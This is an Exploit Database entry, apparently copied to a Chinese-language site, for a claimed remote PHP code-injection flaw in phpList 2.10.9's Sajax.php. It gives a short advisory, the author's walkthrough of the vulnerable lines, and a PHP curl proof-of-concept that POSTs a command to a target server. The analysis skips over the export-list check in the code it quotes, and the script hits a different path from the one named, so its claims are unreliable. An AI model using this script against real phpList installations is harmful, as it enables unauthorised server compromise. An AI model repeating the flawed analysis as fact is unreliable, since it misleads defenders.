phpList 2.10.9 – ‘Sajax.php’ PHP Code Injection

• Exploit Database
• 12 阅读

• 作者： L3b-r1'z
  日期： 2012-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37318/

• source: https://www.securityfocus.com/bid/53693/info
  
  PHPList is prone to a remote PHP code-injection vulnerability.
  
  An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
  
  PHPList 2.10.9 is vulnerable; other versions may also be affected.
  
  # --------------------------------------- #
  # This PoC was written for educational purpose. Use it at your own risk.
  # Author will be not responsible for any damage.
  # --------------------------------------- #
  # 1) Bug
  # 2) PoC
  # --------------------------------------- #
  # 2) Bug :
  # An attacker might execute arbitrary PHP code with this vulnerability.
  # User tainted data is embedded into a function that compiles
  # PHP code on the run and #executes it thus allowing an attacker to inject
  own PHP code that will be
  # executed. This vulnerability can lead to full server compromise.
  # Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line
  (63)
  # 63. $func_name = $_POST["rs"];
  # if (! empty($_POST["rsargs"]))
  # $args = $_POST["rsargs"];
  # else
  # $args = array();
  # }
  #
  # if (! in_array($func_name, $sajax_export_list))
  # echo "-:$func_name not callable";
  # else {
  # echo "+:";
  # 74.$result = call_user_func_array($func_name, $args);
  # echo $result;
  # }
  # exit;
  # }
  # So We Have Variable Func Name With Post rs :)
  # In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It.
  # Look To Line (74).
  # Call_User_Func_Array($func_name, $args);
  # Attacker Can Inject In Get Paramater Or POST PHP Code.
  # --------------------------------------- #
  # 3) PoC :
  # <?php
  # $target = $argv[1];
  # $ch = curl_init();
  # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  # curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");
  # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01;
  Windows NT 5.0)");
  # curl_setopt($ch, CURLOPT_POST, 1);
  # curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");
  # curl_setopt($ch, CURLOPT_TIMEOUT, 3);
  # curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
  # curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
  # curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
  # $buf = curl_exec ($ch);
  # curl_close($ch);
  # unset($ch);
  # echo $buf;
  # ?>